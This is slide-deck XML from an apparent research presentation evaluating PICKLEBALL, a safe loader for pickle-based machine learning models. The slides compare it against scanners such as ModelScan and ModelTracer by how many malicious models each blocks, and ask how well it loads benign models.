                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>75/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>89.3%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>44/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>52.4%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>84/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>84/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D9EAD3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047" name="Google Shape;1047;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38125" y="1554947"/>
            <a:ext cx="405000" cy="389700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12275">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="58875" lIns="58875" spcFirstLastPara="1" rIns="58875" wrap="square" tIns="58875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="901"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1048" name="Google Shape;1048;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38125" y="1554939"/>
            <a:ext cx="404978" cy="389345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1049" name="Google Shape;1049;p82"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="220827" y="1874031"/>
            <a:ext cx="697722" cy="697722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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53" name="Shape 1053"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Google Shape;1054;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1055" name="Google Shape;1055;p83"/>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1056" name="Google Shape;1056;p83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316675" y="896800"/>
            <a:ext cx="3595200" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>RQ:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> How well does P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> correctly </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>load benign pickle models</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1057" name="Google Shape;1057;p83"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
                <a:gridCol w="1113625"/>
                <a:gridCol w="1194125"/>
                <a:gridCol w="1181750"/>
                <a:gridCol w="1150800"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Malicious Blocked</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
